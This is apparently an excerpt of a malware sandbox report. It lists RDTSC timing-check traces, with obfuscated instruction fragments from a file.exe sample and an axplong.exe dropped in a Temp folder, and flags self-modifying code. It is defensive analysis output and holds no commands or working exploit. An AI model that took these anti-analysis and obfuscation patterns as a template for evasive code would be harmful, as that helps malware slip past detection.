Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510C1F second address: 5510C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510C2F second address: 5510C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510C35 second address: 5510C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99D0DE6F31h 0x00000008 call 00007F99D0DE6F30h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F99D0DE6F2Ah 0x0000001a pushfd 0x0000001b jmp 00007F99D0DE6F32h 0x00000020 or ch, 00000018h 0x00000023 jmp 00007F99D0DE6F2Bh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551095D second address: 5510982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 004C5E77h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F99D0D12E25h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510982 second address: 5510988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510988 second address: 551098C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551098C second address: 55109BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F99D0DE6F35h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55109BE second address: 55109E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F99D0D12E1Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5590693 second address: 5590699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5590699 second address: 559069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559069D second address: 55906C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov bh, 8Dh 0x00000010 pop eax 0x00000011 mov ch, dl 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F99D0DE6F2Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55808E7 second address: 55808EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55808EC second address: 55808FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55808FA second address: 55808FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55808FE second address: 5580902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5580902 second address: 5580908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5580908 second address: 558090E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 558090E second address: 5580912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5580912 second address: 5580916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 558071A second address: 558071E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 558071E second address: 5580724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5580724 second address: 5580797 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99D0D12E20h 0x0000000f push eax 0x00000010 jmp 00007F99D0D12E1Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F99D0D12E26h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F99D0D12E1Eh 0x00000024 sbb al, 00000078h 0x00000027 jmp 00007F99D0D12E1Bh 0x0000002c popfd 0x0000002d mov cx, 1DAFh 0x00000031 popad 0x00000032 pop ebp 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 movzx eax, di 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5580797 second address: 558079B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552001F second address: 5520025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520025 second address: 552002B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552002B second address: 5520048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F99D0D12E1Dh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520048 second address: 552004C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552004C second address: 5520052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5580CB5 second address: 5580CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530484 second address: 553049A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553049A second address: 553049E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553049E second address: 55304A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55304A4 second address: 55304AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55304AA second address: 55304AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55304AE second address: 55304F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushfd 0x0000000f jmp 00007F99D0DE6F2Bh 0x00000014 and eax, 4E75759Eh 0x0000001a jmp 00007F99D0DE6F39h 0x0000001f popfd 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55304F7 second address: 5530561 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99D0D12E1Dh 0x00000008 sbb cx, 8BD6h 0x0000000d jmp 00007F99D0D12E21h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F99D0D12E1Eh 0x0000001d push FFFFFFFEh 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushfd 0x00000025 jmp 00007F99D0D12E23h 0x0000002a jmp 00007F99D0D12E23h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530561 second address: 553057A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 12E00FE4h 0x00000010 pushad 0x00000011 mov cx, AFFFh 0x00000015 push eax 0x00000016 push edx 0x00000017 mov bh, ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553057A second address: 5530603 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99D0D12E27h 0x00000008 add cl, 0000007Eh 0x0000000b jmp 00007F99D0D12E29h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 add dword ptr [esp], 6461B034h 0x0000001b jmp 00007F99D0D12E1Eh 0x00000020 push 238EA125h 0x00000025 jmp 00007F99D0D12E21h 0x0000002a add dword ptr [esp], 53AA0CDBh 0x00000031 pushad 0x00000032 mov ebx, eax 0x00000034 call 00007F99D0D12E28h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530603 second address: 5530645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr fs:[00000000h] 0x0000000c pushad 0x0000000d jmp 00007F99D0DE6F2Dh 0x00000012 call 00007F99D0DE6F30h 0x00000017 pop edi 0x00000018 popad 0x00000019 nop 0x0000001a pushad 0x0000001b mov ax, 2DB9h 0x0000001f push esi 0x00000020 mov al, dl 0x00000022 pop ecx 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov ax, di 0x0000002b movsx edx, ax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530645 second address: 55306FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99D0D12E1Dh 0x00000008 mov ah, D3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F99D0D12E29h 0x00000015 xor cx, 4996h 0x0000001a jmp 00007F99D0D12E21h 0x0000001f popfd 0x00000020 push eax 0x00000021 pushfd 0x00000022 jmp 00007F99D0D12E27h 0x00000027 add eax, 56A9C2CEh 0x0000002d jmp 00007F99D0D12E29h 0x00000032 popfd 0x00000033 pop eax 0x00000034 popad 0x00000035 sub esp, 1Ch 0x00000038 jmp 00007F99D0D12E27h 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F99D0D12E25h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55306FA second address: 553070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0DE6F2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553070A second address: 5530719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530719 second address: 553071D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553071D second address: 5530723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530723 second address: 5530750 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F99D0DE6F30h 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99D0DE6F2Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530750 second address: 5530756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530756 second address: 553075D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553075D second address: 553076B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553076B second address: 553076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553076F second address: 5530775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530775 second address: 553079A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ebx, 278D5CC2h 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 push ebx 0x00000016 mov si, 7C41h 0x0000001a pop eax 0x0000001b mov ecx, ebx 0x0000001d popad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553079A second address: 553079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553079F second address: 55307B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 0F9Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55307B3 second address: 55307B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55307B7 second address: 55307D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55307D3 second address: 5530895 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0D12E1Dh 0x00000009 sbb ah, 00000056h 0x0000000c jmp 00007F99D0D12E21h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr [7743B370h] 0x0000001a pushad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007F99D0D12E28h 0x00000024 sbb cl, FFFFFFA8h 0x00000027 jmp 00007F99D0D12E1Bh 0x0000002c popfd 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007F99D0D12E28h 0x00000034 xor cx, 3308h 0x00000039 jmp 00007F99D0D12E1Bh 0x0000003e popfd 0x0000003f popad 0x00000040 xor dword ptr [ebp-08h], eax 0x00000043 jmp 00007F99D0D12E26h 0x00000048 xor eax, ebp 0x0000004a pushad 0x0000004b push edi 0x0000004c pushfd 0x0000004d jmp 00007F99D0D12E1Ah 0x00000052 and al, FFFFFF98h 0x00000055 jmp 00007F99D0D12E1Bh 0x0000005a popfd 0x0000005b pop esi 0x0000005c push eax 0x0000005d push edx 0x0000005e push ebx 0x0000005f pop ecx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530895 second address: 55308E5 instructions: 0x00000000 rdtsc 0x00000002 call 00007F99D0DE6F2Bh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 call 00007F99D0DE6F37h 0x00000015 jmp 00007F99D0DE6F38h 0x0000001a pop eax 0x0000001b popad 0x0000001c mov dword ptr [esp], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55308E5 second address: 55308EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55308EB second address: 553093C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d pushad 0x0000000e movzx ecx, di 0x00000011 mov si, di 0x00000014 popad 0x00000015 pushad 0x00000016 mov ax, bx 0x00000019 movsx edx, ax 0x0000001c popad 0x0000001d popad 0x0000001e mov dword ptr fs:[00000000h], eax 0x00000024 jmp 00007F99D0DE6F34h 0x00000029 mov esi, dword ptr [ebp+08h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553093C second address: 5530940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530940 second address: 5530944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530944 second address: 553094A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553094A second address: 5530969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530969 second address: 55309E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 call 00007F99D0D12E28h 0x0000000c mov ah, 45h 0x0000000e pop edx 0x0000000f popad 0x00000010 test eax, eax 0x00000012 pushad 0x00000013 mov edx, eax 0x00000015 pushfd 0x00000016 jmp 00007F99D0D12E24h 0x0000001b sub cx, FB98h 0x00000020 jmp 00007F99D0D12E1Bh 0x00000025 popfd 0x00000026 popad 0x00000027 jne 00007F9A42B22182h 0x0000002d pushad 0x0000002e movzx esi, di 0x00000031 mov ecx, edi 0x00000033 popad 0x00000034 mov eax, 00000000h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c call 00007F99D0D12E21h 0x00000041 pop esi 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55309E0 second address: 55309E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55309E6 second address: 55309EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55309EA second address: 5530A24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-20h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F99D0DE6F37h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530A24 second address: 5530A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [esi] 0x0000000b pushad 0x0000000c mov si, 0473h 0x00000010 pushfd 0x00000011 jmp 00007F99D0D12E28h 0x00000016 add eax, 329CAF78h 0x0000001c jmp 00007F99D0D12E1Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [ebp-24h], ebx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530A7C second address: 5530A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530A80 second address: 5530B0C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99D0D12E20h 0x00000008 sbb cl, FFFFFFD8h 0x0000000b jmp 00007F99D0D12E1Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 jmp 00007F99D0D12E1Fh 0x00000019 pop ecx 0x0000001a popad 0x0000001b test ebx, ebx 0x0000001d jmp 00007F99D0D12E1Fh 0x00000022 je 00007F9A42B21FCCh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov dx, 4426h 0x0000002f pushfd 0x00000030 jmp 00007F99D0D12E27h 0x00000035 xor cx, 96AEh 0x0000003a jmp 00007F99D0D12E29h 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530B0C second address: 5530B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530B12 second address: 5530B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530B16 second address: 5530B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 26EA6B second address: 26EA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 26EA71 second address: 26EA9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007F99D0DE6F26h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 3E0877 second address: 3E0885 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 3E0885 second address: 3E0889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 3E0889 second address: 3E0897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F99D0D12E16h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 3F9FF9 second address: 3F9FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BBEADF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D70C94 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BBC69A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D82AF4 instructions caused by: Self-modifying code
